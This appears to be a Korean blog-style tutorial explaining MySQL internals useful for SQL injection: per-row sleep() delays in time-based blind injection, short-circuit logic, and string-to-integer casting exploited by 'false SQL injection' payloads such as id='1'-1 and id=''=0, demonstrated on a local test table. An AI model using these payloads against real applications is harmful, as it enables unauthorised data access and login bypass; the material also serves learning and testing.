원활한 SQL Injection을 위해 숙지해야 할 mysql의 작동원리

원활하고 깔끔한 sql injection을 하기 위해서는 sql의 작동 방식에 대한 이해가 필요하다.

 mysql> select * from test;

 +----+----------+---------+

 | no | id       | pw      |

 +----+----------+---------+

 |  1 | guest    | guestpw |

 |  2 | admin    | asdf    |

 +----+----------+---------+

 2 rows in set (0.00 sec)

test 테이블에 2개의 row가 존재한다.

select * from test where sleep(1); 이라는 쿼리를 실행했을 때 실행 시간은 몇초일까?

실행 결과를 보자.

 mysql> select * from test where sleep(1);

 Empty set (2.00 sec)

2초가 소요되었다.

이는 select쿼리에서 where절의 true여부를 알기 위해 where절의 논리를 row마다 일일히 대입해보기 때문이다.

no=1인 row에서 where sleep(1) 을 실행했으니 1초, no=2인 row에서 또 1초가 지연되어 2초가 소요되는 것이다.

이는 처음 시간기반 blind sql injection을 해보는 사람들이 한 번쯤 겪는 현상이기도 하다.

다음으로 select * from test where true or sleep(1); 쿼리를 실행해보자.

 mysql> select * from test where true or sleep(1);

 +----+-------+---------+

 | no | id    | pw      |

 +----+-------+---------+

 |  1 | guest | guestpw |

 |  2 | admin | asdf    |

 +----+-------+---------+

 2 rows in set (0.00 sec)

두개의 row에서 where true or sleep(1) 을 실행해서 2초가 지연되어야 할텐데 실행시간은 0초가 소요되었다.

이는 mysql이 쿼리의 최적화를 한 탓에 발생하는 현상이다.

true or sleep(1) 에서 이미 true로 인해 참이 되었으니 뒤에 어떤 조건이 오더라도 그 둘을 or 연산한 값은 참이다.

(TRUE or FALSE = TRUE, TRUE or TRUE = TRUE)

그러므로 뒤의 조건은 더이상 실행하는게 무의미하다고 판단, 자체적으로 행동을 중단하고 true를 return하는 것이다.

쿼리의 최적화는 and, xor등 다른 논리연산시에도 마찬가지로 작동한다.

또한 mysql은 서로 다른 자료형을 비교, 연산시에 type cast를 수행한다.

character형과 int형의 데이터를 비교, 연산시에 character형 데이터는 앞에서 잘라낸 숫자를 int형으로 바뀌게 된다.

 mysql> select --'abc3';

 +----------+

 | --'abc3' |

 +----------+

 |        0 |

 +----------+

 1 row in set, 1 warning (0.00 sec)

 mysql> select --'3abc';

 +----------+

 | --'3abc' |

 +----------+

 |        3 |

 +----------+

 1 row in set, 1 warning (0.00 sec)

 mysql> select --'123abc';

 +------------+

 | --'123abc' |

 +------------+

 |        123 |

 +------------+

 1 row in set, 1 warning (0.00 sec)

이를 이용해 select * from test where id='1'-1 이렇게 id=0 을 만들어서 공격하는 false sql injection 기법이 있다.

 mysql> select * from test where id='1'-1;

 +----+-------+---------+

 | no | id    | pw      |

 +----+-------+---------+

 |  1 | guest | guestpw |

 |  2 | admin | asdf    |

 +----+-------+---------+

 2 rows in set (0.00 sec)

위에서 서술한 mysql은 character형과 int형의 데이터를 비교, 연산시에 character형 데이터는 앞에서 잘라낸 숫자를 int형으로 변환한다는 특징을 사용한 것이다.

where id=0 으로 조건을 주면 character형인 id가 0으로 변환되어 where 0=0 이 되고 0=0 은 true이므로 where true 로 비교되어 값을 return하는 원리이다.

이 기법은 페이로드가 극도로 간결해진다는 장점이 있다.

하지만 id에 숫자로 시작하는 값이 존재할 경우에 id가 그 숫자로 변환되며 해당 값을 return하지 못한다.

 mysql> select * from test;

 +----+---------+---------+

 | no | id      | pw      |

 +----+---------+---------+

 |  1 | guest   | guestpw |

 |  2 | admin   | asdf    |

 |  3 | 123test | yoyo    |

 +----+---------+---------+

 3 rows in set (0.00 sec)

 mysql> select * from test where id=0;

 +----+-------+---------+

 | no | id    | pw      |

 +----+-------+---------+

 |  1 | guest | guestpw |

 |  2 | admin | asdf    |

 +----+-------+---------+

 2 rows in set (0.00 sec)

value를 0으로 만드는것으로 끝내지 않고 type cast를 이용하면 위 문제를 해결 가능하다.

id='' 처럼 존재하지 않는 값을 비교해 false를 만들고 다시 =0 이나 <1 등을 사용해 where true를 만들어주면 된다.

 mysql> select * from test where id=''=0;

 +----+---------+---------+

 | no | id      | pw      |

 +----+---------+---------+

 |  1 | guest   | guestpw |

 |  2 | admin   | asdf    |

 |  3 | 123test | yoyo    |

 +----+---------+---------+

 3 rows in set (0.00 sec)

 mysql> select * from test where id=''<1;

 +----+---------+---------+

 | no | id      | pw      |

 +----+---------+---------+

 |  1 | guest   | guestpw |

 |  2 | admin   | asdf    |

 |  3 | 123test | yoyo    |

 +----+---------+---------+

 3 rows in set (0.00 sec)

where true만 만들어주면 되므로 다양한 응용이 가능하다.

= 보다 연산의 우선순위가 앞서는 연산자를 사용해 로직이 꼬이지 않도록 주의한다.